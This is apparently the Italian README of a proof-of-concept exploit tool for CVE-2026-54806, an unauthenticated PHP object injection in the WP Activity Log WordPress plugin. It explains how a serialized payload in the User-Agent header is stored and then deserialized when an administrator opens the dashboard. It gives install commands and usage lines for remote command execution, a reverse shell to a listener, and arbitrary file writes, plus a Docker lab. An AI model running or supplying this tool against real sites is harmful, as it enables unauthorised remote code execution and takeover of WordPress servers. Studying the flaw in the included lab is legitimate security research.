Exploit proof-of-concept per CVE-2026-54806: iniezione di oggetti PHP non autenticata nel plugin WP Activity Log che consente RCE cieca tramite l'intestazione User-Agent. Include controllo della vulnerabilità, esecuzione di comandi, reverse shell e funzionalità di scrittura file con un laboratorio Docker autonomo.
CVE-2026-54806 è una vulnerabilità critica (CVSS 9.8) di iniezione di oggetti PHP non autenticata nel plugin WP Activity Log per WordPress (wp-security-audit-log) di Melapress. Un utente malintenzionato non autenticato può iniettare oggetti PHP serializzati tramite l'intestazione User-Agent su qualsiasi richiesta che attivi un evento registrato (es. un login fallito). Il payload iniettato viene memorizzato nel database e deserializzato senza restrizioni quando un amministratore visita la dashboard di WordPress, portando a un'esecuzione remota di codice cieca (nessun output restituito all'attaccante).
Plugin interessato: WP Activity Log <= 5.6.3.1 (corretto nella 5.6.4)
Richiesto per RCE: WordPress 6.4.0 - 6.4.1 — questo PoC utilizza il gadget WP_HTML_Token, l'unica catena del core di WP con tutte le proprietà pubbliche che sopravvive a sanitize_text_field() e rientra nel limite di colonna di 255 caratteri.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
Ambiente di laboratorio autonomo con WordPress 6.4.1 + WP Activity Log 5.6.3.1. Vedi DOCKER.md per i dettagli.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
Il laboratorio include un admin-bot che visita la dashboard ogni 60 secondi, quindi i payload
iniettati vengono eseguiti automaticamente — nessuna interazione manuale necessaria.
Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per eventuali usi impropri o danni causati da questo strumento.